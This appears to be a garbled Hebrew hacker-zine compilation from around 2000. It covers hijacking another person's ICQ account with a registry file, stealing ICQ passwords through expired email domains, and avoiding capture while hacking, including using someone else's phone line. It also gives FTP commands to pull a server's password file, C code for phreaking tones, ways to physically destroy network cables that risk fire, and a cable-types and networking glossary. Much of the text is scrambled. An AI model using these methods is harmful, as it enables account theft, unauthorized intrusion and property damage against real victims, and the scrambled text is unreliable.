"param7"="#practice""param8"="#redden""param9"="#tabletop"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\microsoft vchat\param2]
"paramname"="avatar""canotherchange"="yes""param1"="amani""param2"="anderson"
"param3"="brb""param4"="cat""param5"="crab""param6"="dancer""param7"="dred"
"param8"="duggan""param9"="joey""param10"="lulu"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\netscape cooltalk]
""="type"="command""command line"
"path"="c:\\program files\\netscape\\navigator\\cooltalk\\cooltalk.exe"
"
url"="http://home.netscape.com/comprod/products/navigator/version_3.0/communication/cooltalk/index.ht
"ml
version"=dword:00000004"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\rikken on the rockx]
"type"="clientserver""client command line"="/client %i"
"server command line"="/server""client path"="c:\\rikken\\rikken.exe"
"/server path"="c:\\rikken\\rikken.exe""url"="http://www.dse.nl/~ramon/rikken"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\vdophone]
"type"="extension""format"="callto://""extension"="vdp"
url"="http://www.vdo.net/download/""version"=dword:00000003"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\vidcall]
"type"="command""command line"="""path"="c:\\vidcall\\corp.exe"
"url"="http://www.access.digex.net/~vidcall/vidcall.html"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\webphone]
"/type"="extension""format"="""extension"="wpc""url"="http://www.webphone.com"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\quake]
"type"="clientserver""client command line"="-mpath +connect %i"
"server command line"="-mpath -listen""client path"="c:\\quake_sw\\q95.bat"
"server path"="c:\\quake_sw\\q95.bat""server1"="quake.xmisson.com"
url"="http://www.idsoftware.com""version"=dword:00000010"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\voxchat]
"type"="servercommand""format"="groupname=i port=15000"
path"="c:\\program files\\voxchat\\voxchat.exe""numparameters"=dword:00000001"
"server1"="voxchat1.voxware.com""server2"="voxcha2.voxware.com"
"url"="http://www.voxchat.com/low/download.htm"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\voxchat\param1]
"paramname"="room""canotherchange"="no""param1"="#icq"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\phonelocations]
lastupdate"=dword:00000000"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\main]
selectedcell"=dword:00000000"alwaysontop"="yes""leftbarwidth"=dword:000000ad"
rightbarwidth"=dword:000000ad"floatbar-left"=dword:00000255"
floatbar-right"=dword:00000307"floatbar-top"=dword:00000033"
"floatbar-bottom"=dword:000001f3"state"="floating""minimized"="no"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\windows]
response"=dword:008f00c9"searchwiz"=dword:006f00c0"notifywiz"=dword:006f00c0"
posnovice"=dword:009300dc"posmotd"=dword:00af00b7"posmenuconfig"=dword:00a900e7"
removeuin"=dword:00bb0108"message"=dword:008b004f"security"=dword:007400b4"
prefs"=dword:007f00ae"history"=dword:0096003a"file request"=dword:009000f0"
filetransfer"=dword:009700ae"info"=dword:009300d2"fetchuser"=dword:00e9010e"
url message"=dword:00a00069"away"=dword:00bd00f7"chat request"=dword:009f00dd"
contacts list"=dword:008300bd"chat"=dword:008b00f5"phone"=dword:000a000a"
phone call request"=dword:007700e5"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\search]
place"=dword:00a400cc"type"=dword:00000002"width"=dword:01880188"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\icq chat]
chatstyle counter"=dword:00000003"pen color"=dword:0080ffff"
"back color"=dword:00004000"send focus"="yes""enable sounds"="yes"
"name bars"="yes""always on top"="no""autocolor"="no""override format"="yes"
"show toolbar"="yes""state"=dword:00010000"new font name"="times new roman"
char set"=dword:00000000"irclistwidth"=dword:00000006"
font pitch"=dword:00000012"new font height"=dword:0000000e"
font effects"=dword:00000000"autocolor 0"=dword:00000000"
autocolor 1"=dword:00000080"autocolor 2"=dword:00008000"
autocolor 7"=dword:00808080"autocolor 8"=dword:00c0c0c0"
autocolor 9"=dword:000000ff"autocolor 10"=dword:0000ff00"
autocolor 11"=dword:0000ffff"autocolor 12"=dword:00ff0000"
autocolor 13"=dword:00ff00ff"autocolor 14"=dword:00ffff00"
autocolor 15"=dword:00ffffff"place-left"=dword:0000000a"
place-right"=dword:000001fe"place-top"=dword:0000000a"
"place-bottom"=dword:0000021a"new logfile name"="icqchatlog.txt"
"new savefile name"="icqchatsave.txt"
[credit abt the reg key to http://i.am/devil crew]
.reg ‫ שמרו את הקובץ כקובץ‬.3

.‫**** אם יש לכם תוכנת איסיקיו פתוחה סגרו אותה‬
db - ‫) לתיקית ה‬idx,dat( ‫ העתיקו את הקבצים שהשגתם בהתחלה‬.4
)ex. c:\progra~1\icq\db( .‫של האיסיקיו שלכם‬
! ‫ הקישו כן‬...‫בלהבלה‬..‫ זה ישאל אתכם אם ברצונכם‬.‫ שכתבתם זה עתה‬reg ‫הריצו את הקובץ‬.5
‫ דרך התפריט של האיסיקיו בתפריט ההתחלה(או דרך התיקיה‬dbconvert - ‫ הריצו את תוכנת ה‬.6
.)‫עצמה‬
"convert a old db" : ‫לחצו על‬
‫זה יתחיל לחסל את המנוי הישן ואמור לפתוח אוטומטית את האיסיקיו עם המשתמש החדש‬
.)‫(הקורבן‬
.‫ פתחו זאת בעצמכם‬, ‫אם זה לא נתפח לבד‬
: ‫אם זה לא עובד עדיין על המספר של הקורבן שלכם עשו זאת‬
."click icq menu, click on "add/change current user", then click on "change the active user
.choose the uin of the victim
: ‫ למה זה קורה אתם שואלים ? יש שתי סיבות עיקריות‬,‫זה יכול לבקש ממכם סיסמא‬
.‫ הופעלה הגנת קראקים על המספר שאתם מתלבשים עליו אז תשכחו מלגלות עליו דברים‬.‫א‬
! .‫היא‬/‫ ואז אתם בעצם הוא‬.‫ליין‬-‫ המספר נמצא אוןליין אז אתם צריכים לחכות עד שהוא יהיה אוף‬.‫ב‬
! ‫בהצלחה‬
.‫ על הניסוח של התוסף‬rul3r ‫ ותודה ל‬.‫ חבר קרוב ועוזר לארגון‬- the-mod ‫תוסף ע"י‬
:‫השגת סיסמאות של מספרי איסיקיו‬
‫ בשביל להשיג‬icq ‫מאיל שלו כתובת שלא קיימת‬-‫מה צריך ? צריך רק למצוא משתמש שכתב באי‬
‫מספר ב‬
:‫לדוגמא‬
:‫אם מישהו רשם למשל‬
‫‪asdf@asdf.com‬‬
‫נכנסים לאחד מהאתרים שמביאים לרשום דומינים בחינם והם מביאים גם אי‪-‬מאיל‬
‫( ‪) www.namedemo.com / www.namezero.com‬‬
‫ושם רושמים את הכתובת‬
‫‪asdf.com‬‬
‫אחרי שרושמים את הכתובת הזאת‬
‫פותחים חשבון דואר באתר שבו רשמתם את הדומין‬
‫ושהדואר שאתם פותחים יהיה‬
‫‪asdf@asdf.com‬‬
‫אחרי שפותחים את כתובת הדואר‬
‫נכנסים לאתר ‪www.icq.com/password :‬‬
‫של מי שבחרתם ‪-icq‬ושם כותבים את מספר ה‬
‫אם עשיתם את כל השלבים נכון‬
‫הסיסמא של המספר תשלח לדואר שלכם‬
‫( ‪) asdf@asdf.com‬‬
‫הצעות‪ :‬כדאי לקחת מספר שהוא גם מספר הטלפון\האישי שלך שיהיה קל לזכור‬
‫נכתב ע"י ‪ , the-mod‬נוסח ע"י ‪ rul3r‬ונכנס כתוסף לטקסט של ‪.pirs[i]ng‬‬
‫בקשות או כל דבר אחר ל ‪ the -mod‬לשלוח ל‪:‬‬
‫‪themod@hotmail.co.il‬‬
‫‪by the-mod‬‬
‫מה היא פריצה ‪ +‬דוגמה‬
‫מה במדריך זה‪:‬‬

‫* מה זה פריצה ? ולמה ?‬
‫* איך להיזהר בזמן הפריצה ?‬
‫* ‪proxy‬‬
‫* הסבר על פריצה אתרי אף‪.‬טי‪.‬פי והוצאת קובץ סיסמאות‪.‬‬
‫* מאגרי מידע מומלצים‪.‬‬
‫מה זה פריצה ? ולמה ?‬
‫פריצה בעברית נכונה היא כניסה‪/‬לגנוב גישה למקום שאין לך גישה לשם‪.‬‬
‫להיכנס למקום‪/‬אזור‪/‬מערכת‪/‬רשת שאתה לא מורשה להיות שם‪,‬‬
‫אבל אתה בכל זאת אתה נכנס ע"י פריצה למקום‪/‬אזור‪/‬מערכת‪/‬רשת‪.‬‬
‫פריצה היא לא חוקית גם במחשבים וגם בחיים האמיתיים‪ ,‬ויש מדינות שעושות סיפור ממש גדול‬
‫מזה‪.‬‬
‫למשל בישראל אתה לא כל כך חוטף על הראש עם תופסים אותך אבל אם בבריטניה אתה נתפס‪,‬‬
‫אתה מקבל עונש כמו טרוריסט‪ ,‬למרות שכולם יודעים שזה לא אותו דבר אבל ככה הם ה"חיים"‪.‬‬
‫פריצה בכלליות היא חילול הקוד שמנהל מקום‪/‬אזור‪/‬מערכת‪/‬רשת קבע ואף לפעמים שינוי הקוד‪.‬‬
‫באקדור הוא נושא אהוב על האקרים והוא משמש ועוזר להאקר לחדור למקום‪/‬אזור‪/‬מערכת‪/‬רשת‪.‬‬
‫שורות קוד שמישהו הכניס במכוון כדי לאפשר לעצמו (בד"כ) גישה למשהו על מחשב אחר יותר‬
‫בקלות‪..‬‬
‫לדוגמא קוד שיפתח פורט מסויים רק לאי פי מסויים ויתן לו לכתוב שם פקודות קבועות שיבצעו‬
‫פעולה כלשהי לפי מה שמכין הבאקדור קבע‪.‬‬
‫לפעמים האקרים אשר מצאו את הבאקדור מנצלים את זה ומכינים כמה נוספים‬
‫כדי שהפריצה הבאה למערכת תהיה פשוטה יותר‪.‬‬
‫למה פורצים אתם רוצים לדעת ?‬
‫אני חושב שיש שתי קטגוריות לרצון של אנשים לפרוץ‪.‬‬
‫א‪ .‬האקר "טוב" ‪ -‬האקר טוב לא יפרוץ למקום‪/‬אזור‪/‬מערכת‪/‬רשת כדי להרוס או לשים את החותמת‬
‫שלו‪,‬‬
‫לשים את השם שלו ולצפות שיראו בחדשות שהוא פרץ וצריך לפחד ממנו כו'‪ ,‬הוא לא יפרוץ בשביל‬
‫מטרה רעה‪.‬‬
‫הוא יפרוץ‪ ,‬אם בכלל למקום‪/‬אזור‪/‬מערכת‪/‬רשת כדי להראות למנהל הרשתת שיש לו בעיה איפשהו‪.‬‬
‫ישאיר חותמת ולא ימחק את הלוגים או יהרוס משהו‪ .‬המטרה שלו היא לעשות טוב !!!‬
‫ה זה מתחלק לשני חלקים‪:‬‬
‫‪ .1‬מנהל הרשת יודה להאקר שהודיע לו על הבעיה ואף אולי יצ'פר אותו איכשהו‪.‬‬
‫‪ .2‬מנהל הרשת לא יקבל את כטובה וידווח עליו לרשויות ומשם זה מתפצת לעוד שני חלקים (תסתכלו‬
‫יותר למטה)‪.‬‬
‫ב‪ .‬האקר "רע" ‪ -‬הוא ההפך המושלם (או שלא) מההאקר הטוב‪ ,‬הוא יפרוץ למקום‪/‬אזור‪/‬מערכת‪/‬רשת‬
‫כדי‪,‬‬
‫להשליט טרור (קצת מוגזם) ולהרוס את מה שהוא הגיע אליו‪.‬‬
‫הוא ישאיר חותמת שהוא הרס את זה בגלל שבלה בלה‪ ,‬ובלה בלה‪.‬‬
‫קרוב לוודאי שהוא יהרוס את כל הקבצים במערכת וימחק את הלוגים (‪.)logs‬‬
‫הוא לא יעשה שום דבר טוב אלא רק יעשה את זממו‪ ,‬שהוא דבר רע‪.‬‬
‫מפה העניין מת[צל לשני חלקים‪.‬‬
‫‪ .1‬יתפסו אותו ‪ ,‬יקנסו אותו‪ ,‬יהיה משפט‪ ,‬הוא יקבל עונש‪ ,‬לא יגע במחשב ‪ 20‬שנה וימות מזקנה‪.‬‬
‫‪ .2‬לא יתפסו אותו‪ ,‬לא יקנסו אותו‪ ,‬לא יהיה משפט‪ ,‬הוא לא יענש‪ ,‬הוא יהרוס עוד אתר ומשם זה‬
‫ממשיך‪.‬‬
‫אולי יתפסו ואולי לא‪ .‬העונש על פריצה הוא תמיד כבד ‪ ,‬אבל יש מדינות שהוא יותר מדי כבר‪.‬‬
‫תודה ל‪... -‬‬
‫איך להיזהר בזמן הפריצה ?‬

‫קודם כל הכי חשוב‪ ,‬בכלל לא כדאי לפרוץ אלא אם אתם בטוחים שאתם יודעים איך להיזהר‪.‬‬
‫הנה פה כמה שיטות נחמדות להגן על עצמכם‪.‬‬
‫יש כאלה אנשים שאומרים לא לפרוץ מהבית‪ ,‬ויש כאלה שאומרים לחייג *‪ 43‬שלא יאתרו מאיפה אתה‬
‫מתקשר‪.‬‬
‫כל אלה נכונים במקצת‪.‬‬
‫& לידע אישי‪ 43* ,‬לא חוסם את השיחה אלא מונע *‪ .42‬במכשירי שיחה מזוהה רגילים זה מונע את‬
‫הצגת המספר‪,‬‬
‫אבל בחברות אינטרנט וכל מה שיש לו ציוד רציני זה ימנע *‪ 42‬ולא יותר‪.‬‬
‫השיטה הכי טובה לא להיתפס‪ ,‬היא לא לעשות את זה אבל אם בכל מקרה אתם רוצים אז הנה‪:‬‬
‫‪ .1‬תנסו להסוות את האיפי ‪ /‬הוסט ‪ /‬סבנט מסק שלכם‪.‬‬

‫אם אתם יכולים אפילו את המספר טלפון שעליו אתם מתחברים לאינטרנט ‪ ,‬לא דרך *‪ 43‬אלא דרכים‬
‫אחרות אם אתם מכירים‪.‬‬
‫‪ .2‬תתחברו דרך כמה שיותר תחנות שידור כדי שיהיה קשה להגיע אליכם‪ proxy( .‬וכו')‪.‬‬
‫‪ .3‬עשו ספופ ממש חזק לאיפי שלכם שגם עוד שנה לא יגיעו אליו‪.‬‬
‫‪ .4‬תנסו לא לפרוץ מהבית כי זה באמת עוזר אבל זה תלוי‪ ,‬אם יש לכם מקום שאתם יכולים להיות שם‬
‫הרבה זמן‪,‬‬
‫ולא יחדשו בכם או לא יגיעו אליכם לאחר המעשה‪ ,‬אז לכו על זה‪.‬‬
‫‪ .5‬כמו כן השיטה לדעתי הכי טובה ‪ ,‬היא להתחבר לקו טלפון של מישהו ומשם להתחבר לאינטרנט‬
‫ולעשות את זממכם‪.‬‬
‫לעוד מידע איך לעשות על זה לכו לטקסטי הפריקינג שלנו וחפשו מידע ברחבי הרשת ‪.‬‬
‫‪.proxy‬‬
‫שרת המוקם על ידי ספקי שירות (חברות אינטרנט‪ ,‬חברות גדולות וכו') למען לקוחותיו ותפקידו‬
‫ליצור‬
‫קשר עם מחשבים ברשת ולשלוף מהם מידע על פי בקשת הגולשים‪ .‬לשרת הפרוקסי חיבור מהיר‬
‫משל הגולש הממצוע עם המודם ולכן משמש כמקום מהיר בהרבה לקבלת קבצים ממנו‪.‬‬
‫אם הרבה אנשים מבקשים את אותו קובץ ‪ -‬הקובץ נשמר בשרת הפרוקסי‪ ,‬ובכך חוסך לגולשים את‬
‫ההמתנה‬
‫לקבלת המידע משרת האינטרנט המרוחק‪ .‬על שרתי פרוקסי יש גם הגנה ולכן הם יכולים לשמש‬
‫כפיירוול‪.‬‬
‫ככה כל העניין הזה עובד‪:‬‬
‫‪| | pc-modem | -----> | proxy | -----> | site‬‬
‫הסבר על פריצה אתרי אף‪.‬טי‪.‬פי והוצאת קובץ סיסמאות‪.‬‬
‫מהו בעצם אף‪.‬טי‪.‬פי (‪? )ftp‬‬

‫‪ ,ftp - file transport protocol‬הוא פרוטוקול אשר משמש אותנו ואת אחרים להעברת קבצים‬
‫באינטרנט‪.‬‬
‫כדי לגשת לאתר אף‪.‬טי‪.‬פי של מישהו צריך שם משתמש וסיסמא‪ ,‬אפשר גם להיכנס כאנונימי ‪ ,‬אורח‪.‬‬
‫אבל אם אתה נכנס כאורח קרוב לוודאי שתמיד תוכל רק לצפות שמה שיש וכל מה שיש באתר‪,‬‬
‫הופך להיות למצב "קריאה בלבד"‪ .‬אי אפשר להוריד את זה למחשבך האישי‪.‬‬
‫עכשיו יש לכם פה הסבר על פריצה לאתר אף‪.‬טי‪.‬פי והוצאת קובץ הסיסמאות של האתר‪ ,‬ואז‪,‬‬
‫אפשר לגשת לאתר אף‪.‬טי‪.‬פי ללא ידיעתו של האדמין כי הוא לא יודע שיש לך את הסיסמא‪.‬‬
‫אוקי הנה השיטה רק‪ ,‬תזהרו במה שאתם עושים אם זה‪.‬‬
‫‪ .1‬לכו ותפתחו לכם חלון דוס‪ ,‬פרומט דוס (‪.)dos promt‬‬
‫‪ .2‬הקישו את הרצף הבא‪:‬‬

‫‪ftp ftp.server-to-hack.com‬‬
‫‪ .3‬עכשיו אתה אמורים להקיש שם משתמש‪ ,‬נכון ? אל תקישו כלום‪ ,‬לחצו על אנטר (‪.)enter‬‬
‫‪ .4‬עכשיו אתה אמורים להקיש סיסמא‪ ,‬נכון ? אל תקישו כלום‪ ,‬לחצו על אנטר (‪.)enter‬‬
‫‪ .5‬הקישו את הרצף הבא‪.quote user ftp :‬‬
‫‪ .6‬עכשיו את זה‪.quote cwd ~root :‬‬
‫‪ .7‬ועכשיו את זה‪( .quote pass ftp :‬בלי הנקודה ובלי הנקודתיים)‪.‬‬
‫‪ .8‬עכשיו אתם מחוברים‪ ,‬הקישו את זה ‪.cd etc :‬‬
‫‪ .9‬עכשיו אתם בתיקיה ‪ ,etc‬הקישו ‪.get passwd :‬‬
‫אם עשיתם הכל נכון אז הקובץ של הסיסמאות אמור לרדת לכונן הקשיח שלכם ומשם אתם לבד‪.‬‬
‫אם הוא מוצפן בדרך כלשהי‪ ,‬נסו לעשות אם זה משהו‪,‬‬
‫תחשבו אלי איך לפצח אותו או תורידו תוכנות שתעשה את זה (לא חסר תוכנות כאלה)‪.‬‬
‫ואם הקובץ לא מוצפ אז זה חסך לכם עבודה ! ועבודה רבה !‬
‫משם תעשו מה שאתם רוצים אם מה שאתם מוצאים‪.‬‬
‫&&& כל מה שאתם מקישים‪ ,‬הקישו בלי הנקודה ובלי הנקודתיים‪.‬‬
‫&&&& הערה חשובה !!!! זה לא יעבוד על כל האתרים וכל כל המערכות‪.‬‬

‫אז אם זה לא עובד לכם ‪ ,‬אל תבואו בטענות אלי !‬
‫אני אישית יודע שזה עובד על אתרים מסוימים‪.‬‬
‫יצירת טונים בשפת ‪c‬‬
‫תוכן העניינים‬
‫‪-------------‬‬
‫‪ .1‬טונים‬
‫‪ .2‬מבט ראשוני‬
‫‪ .3‬מבט שני‬
‫‪ .4‬פקודות‬
‫‪ .5‬ערבוב טונים‬
‫‪ .1‬טונים‬
‫טונים הוא בעצם צליל‪ ,‬או סדרה של תווים‪ ,‬אשר רצית בתדירות מסויימת ‪.‬‬
‫טון מסוים ואני משמיע אותו בטלפון ציבורי מסוים זה עושה משהו ‪...‬‬
‫יש המון טונים ‪ :‬לניתוק הטלפון ‪ ,‬לקופסאות וכ'ו ‪...‬‬
‫‪ .2‬מבט ראשוני‬
‫‪>include<stdio.h#‬‬
‫‪>include<dos.h#‬‬
‫‪)(void main‬‬
‫}‬
‫‪;)sound)1800‬‬
‫‪;)delay)1000‬‬
‫‪;)(nosound‬‬
‫{‬
‫‪ .3‬מבט שני‬
‫מה בעצם כל זה עושה ?‬

‫התוכנה מפעילה טון ‪1800‬‬
‫לשנייה ‪ ,‬ואז מפסיקה אותו ‪...‬‬
‫‪/* )(include<dos.h> /* for delay#‬‬
‫}‬
‫‪/* sound)1800(; /* sound of 1800mhz‬‬

‫‪/* delay)1000(; /* for sec‬‬
‫‪/* nosound)(; /* stop the sound‬‬
‫{‬
‫‪ .4‬פקודות‬
‫‪---------‬‬
‫‪ - ;)*(sound .1‬ה * מסמן את הצליל בתדירות שאתה רוצה‬
‫‪ - ;)*(dealy .2‬ה * מסמן את הזמן שאתה רוצה לחכות במילי שניות‬
‫‪ - ;)(nosound .3‬מפסיק את הצליל‬
‫‪ .5‬ערבוב טונים‬
‫‪--------------‬‬
‫אם אתם רוצים לערבב טונים אז ככה צריכה להיות התוכנה‬
‫‪>include<dos.h#‬‬
‫}‬
‫‪;)sound)1000‬‬
‫‪;)sound)200‬‬
‫‪;)delay)1000‬‬
‫‪;)(nosound‬‬
‫{‬
‫מה שקורה פה ‪ ,‬התוכנה מפעיל שני צלילים אחד בתדירות ‪ , 1000‬והשני‬
‫בתדירות ‪ . 2000‬אז היא מחכה ‪ 1000‬מילי שניות שזה שנייה אחת ‪ ,‬ואז מפסיקה‬
‫את הצלילים ‪ .‬זה הכל ‪...‬‬
‫אתם יכולים לערבב המון צלילים ביחד ‪ ,‬אבל לא יצא מזה משהו מועיל ‪.‬‬
‫‪by boba smith‬‬
‫תיקונים ‪efraim abramov‬‬

‫כבלים‬
‫איזה סוגים יש ומה צריך לדעת עליהם ! ‪pir[s]ing /‬‬
‫כל סוגי הכבלים מתחלקים לשלוש חלוקות עיקריות‪.‬‬

‫• כבלים שזורים‬
‫• כבל קוקסיאלי‬
‫• סיב אופטי‬
‫כבל זוג שזור‪)utp( .‬‬

‫ישנם שני סוגים ‪:‬‬
‫מסוכך ולא מסוכך‪.‬‬
‫המסוכך (‪ )twisted pair‬הוא‪:‬שני חוטי נחושת מלופפים זה סביב זה ומבטלים הפרעות בין החוטים‪.‬‬
‫הלא מסוכך ( ‪)unshildedtwisted pair‬הוא‪:‬שני חוטי נחושת מלופפים זה סביב זה עם חוט מפריד‬
‫ביניהם ומבטלים הפרעות בין החוטים‪.‬‬
‫אין ביניהם הבדל רב אבל הם הכבלים הנפוצים ביותר לעבודה משרדית ואני בטוח שבכמה בתי ספר‬
‫משתמשים בכבלים הנ"ל‪.‬‬
‫כבלי ה‪ utp / tp -‬יוצאים מכרטיס הרשת לתקע בקיר (‪ )rj45‬אשר מועברים דרך כבל זהה לרכזת‪.‬‬
‫טבלת סיכום של ה ‪.tp / utp‬‬
‫אורך מירבי ‪)100m )328 feet -‬‬
‫מהירות ‪ 10mbps -‬בד"כ אבל יכול להיות גם ‪100‬‬
‫התקנה‪/‬תחזוקה ‪ -‬פשוטה ביותר וקלה‪.‬‬
‫הפרעות ‪ -‬רגיש במיוחד‪.‬‬
‫עלות ‪ -‬הזול ביותר ‪.‬‬
‫ישנתם כמו כן אותם גרסאות של כבלים רק כפולים‪.‬‬
‫‪.unshielded double twisted pair. / shielded double twisted pair‬‬

‫ההבדל ביניהם הוא שבכל הכפול יש ‪ 2‬ארבע חוטים אשר מלופפים לשתי קבוצות‪.‬‬
‫בכך היא מורידה את אחוז ההפרעות לאחוז פחות יותר ומשפרת את ביצועי הכבל‪.‬שוי נחושת ארוגה‬
‫בין החוט ארוגה בין החוטים למעטפת בפלסטיק‪.‬‬
‫טבלת סיכום של ה ‪.stp / sutp‬‬
‫אורך מירבי ‪)100m )328 feet -‬‬
‫מהירות ‪155mbps -‬‬
‫התקנה‪/‬תחזוקה ‪ -‬קלה אבל צריך מחברים מיוחדים‪ .‬פחות גמיש מהרגיל‪.‬‬
‫הפרעות ‪ -‬עמיד בפני הפרעות‪.‬‬
‫עלות ‪ -‬יקר מה‪ tp -‬אך זול לעומת האחרים‪.‬‬
‫כבל קוקסיאלי ‪-‬‬
‫מורכב משני כבלים אשר מופרדים ע"י שכבת בידוד(כתום)‪.‬‬

‫הליבה המרכזית היא בד"כ מספר סיבי נחושת מופרדים‪.‬‬
‫מעטפת פלסטיק לשמירה על הליבה עשוי כמו כן מסיבי נחושת מופרדים(כחול)‪.‬‬
‫הנתונים מועברים ע"י הליבה המרכזית ‪ -‬צבע כתום בתמונה‪.‬‬
‫ישנם שני סוגים של הכבל הנ"ל‪.‬‬
‫‪( with rg58 connectors.‬שקע) ‪thinnet - connected to the plug‬‬
‫‪( with rg8, rg11 connectors.‬שקע) ‪thicknet - connected to the plug‬‬
‫בכל הכבלים המוליך החיצוני הוא מוארק ומונע הפרעות וחיבול בכבל ע"י סיכוך‪.‬‬
‫טבלת סיכום ‪( thinnet / thicknet -‬קוקסיאל)‪.‬‬

‫‪thinnet‬‬ ‫‪thicknet‬‬
‫אורך מירבי ‪185:‬‬ ‫אורך מירבי ‪500 :‬‬
‫‪mbps‬מהירות ‪10 :‬‬ ‫‪mbps‬מהירות ‪10 :‬‬
‫התקנה‪ :‬קלה‬ ‫התקנה‪ :‬קשה‬
‫הפרעות‪ :‬נמוך מאוד‬ ‫הפרעות‪ :‬נמוך מאוד‬
‫עלות‪ :‬נמוך‬ ‫עלות‪ :‬גבוהה‬
‫כבל סיב אופטי ‪.fiber optic -‬‬
‫חיבור הרשת הטוב ביותר שקיים‪.‬‬
‫הנתונים מועברים בדרך אור ולא כאות חשמלי‪.‬‬
‫הכבל אינו רגיש להפרעות ואינו מחולל הפרעות ופגיעות בקו השידור‪.‬‬
‫הם מסוגלים להעביר כמות אדירה של מידע לעומת כבלים אחרים‪.‬‬
‫בלתי אפשר לצטט ולהפריע לכבל‪.‬‬
‫כך הנתונים עוברים בכבל כאשר כל דפנה היא כמו מן מראה‪:‬‬
‫הכבל בנוי מ ‪ input -‬ו ‪.output -‬‬

‫כאשר ה‪ output -‬שולח תגובות אור כ ‪.2mhz -‬‬
‫וה‪ input -‬שולח תגובות אור כ ‪.12mhz -‬‬
‫טבלת סיכום לכבל האופטי‪:‬‬

‫אורך מירבי ‪2000m -‬‬
‫מהירות ‪100-2000mbps -‬‬
‫התקנה‪/‬תחזוקה ‪ -‬קשה‬
‫הפרעות ‪ -‬אין ‪ ,‬לא היו ולא יהיו‪.‬‬
‫עלות ‪ -‬יקר במיוחד ‪ 7 -‬דולר למטר (נכון לשנת ‪.)2000‬‬
‫טבלת סיכום כללית ‪:‬‬
‫סוג כבל‬ ‫אורך‬ ‫‪mbps‬‬ ‫התקנה‬ ‫הפרעות‬ ‫עלות‬

‫‪tp/utp‬‬ ‫‪100‬‬ ‫‪10-100‬‬ ‫קלה‬ ‫גבוה‬ ‫נמוך‬
‫‪stp/sutp‬‬ ‫‪100‬‬ ‫‪16-155‬‬ ‫קלה‬ ‫גבוה‬ ‫נמוך‬
‫‪thinnet‬‬ ‫‪185‬‬ ‫‪10‬‬ ‫קלה‬ ‫נמוך‬ ‫נמוך‬
‫‪thicknet‬‬ ‫‪500‬‬ ‫‪10‬‬ ‫קשה‬ ‫נמוך מאוד‬ ‫גבוה‬
‫‪optic‬‬ ‫‪1000‬‬ ‫‪100-2000‬‬ ‫קשה מאוד‬ ‫אין‬ ‫גבוה במיוחד‬
‫איך להרוס סוגים שונים של כבלים‬
‫דרכים להרוס את הכבלים הנ"ל‪ :‬אני לא אפרט מה עושה מה כי זה יקח שנים פשוט אני אכתוב מה‬
‫לעשות‪ ,‬איך ולאיזה קבל‪.‬‬
‫‪ - tp / utp / stp / sutp‬אתם לוקחים קיסם ומכסים אותו בסוכר‪.‬‬

‫תוקעים אותו בתוך הכבל‪ ,‬בערך באמצע שלו‪ .‬תדאגו שהמקום שבו תקעתם את הקיסם מכוסה‬
‫הסוכר הוא קרוב לשמש‪ ,‬גלוי לשמש‪ .‬תשאירו את הכבל ככה ל ‪ 22‬שעות והוא גמור‪.‬‬
‫‪ - thinnet / thicknet‬אתם לוקחים את הכבל ופותחים אותו‪ .‬תראו מה יש בפנים‪.‬‬

‫לפי מה שאני יודע אתם תמצאו שם ‪ 4‬חוטים אדומים וכל השאר לא מעניינים‪.‬‬
‫קחו את ההארבעה האדומים הללו וחפשו אותם‪ .‬עכשיו חברו את כל הקצוות החשופים אם צלוטייפ‬
‫(או כל נייר דבק אחר שיחזיק אותם ליום שלם)‪ .‬לאחר כ ‪ 14-‬שעות בערך יהיה קצר הכבל ישרף‪ ,‬גם‬
‫הכרטיס רשת‪ ,‬ותהיה הפסקת חשמל‪.‬‬
‫מושגים‬
‫‪ - admin‬אדמינסטור (מנהל רשת)‬

‫‪ - dns - dmain name server‬שם של דומיין שניתן ע"י שרת כשלהו‬
‫‪iso - organization for international standards / international standardization organization‬‬
‫‪ - tcp/ip‬פרוטוקול התקשורת הנפוץ ביותר בעולם ומהווה את הבסיס לרשת האינטרנט‪.‬‬
‫מבוסס על העקרון שלכל מחשב המחובר לרשת יש כתובת אי‪.‬פי המייצגת אותו‬
‫ועל ידי קריאה למספר זה ניתן להעביר מידע ממחשב למחשב‪.‬‬
‫הבסיס בשיטת העברת נתונית זו היא הפטקא‪ .‬לכל פטקא מומצד תווית מוצא ומטרה‬
‫האומרות לפאקט לאן להשלח‪ .‬הפאקט מועבר בעצמות פרוטוקול הטי‪.‬סי‪.‬פי‪/‬אי‪.‬פי‬
‫‪ - lan‬רשת מקומית‪.‬‬
‫‪ - wan‬כמו רשת מקומית רק גדולה יותר בטווח‪.‬‬
‫‪ - www - world wide web‬רשת האינטרנט‪.‬‬
‫‪ - ppp‬פרוטוקול המשמש לחיבור מחשבים דרך מודם‪ .‬נפוץ בשימוש בעת חיבור לאינטרנט‪.‬‬
‫‪ - pap‬פרוטוקול לאימות סיסמא וזיהוי המשתמש‪.‬‬
‫‪ .repeater - works under physical layer on the osi‬משחזר‪ ,‬מתגבר על מגבלות מרחק ומשחזר את‬
‫האות אשר הגיע מהצד הרחוק‪.‬‬
‫‪ - bridge‬גשר‪ ,‬משש לחיבור צמתים שונים ברשת‪ ,‬לגשרים אין כתובות ואי אפשר לפנות אליהם‬
‫לצורך מסוים‪.‬‬
‫‪ - router‬נתב‪ ,‬בוחן את כתובות היעד ומחליט מאיזה נתיב לשדר ולאן‪.‬‬
‫‪ - rip - routing information protocol‬בחירת נתיב שידור כתוצאה מבחירה בעזרת בדיקה אשר‬
‫בודקת מספר קוי תקשורת מינימליים‪.‬‬
‫‪ - spf - shortest path first‬שיפור של הריפ בשיטת בחירה זאת נלקחים בחשבון הפריטים הבאים ‪:‬‬
‫מחיר הקו‪ ,‬עומס ומהירות תעבורה‪.‬‬
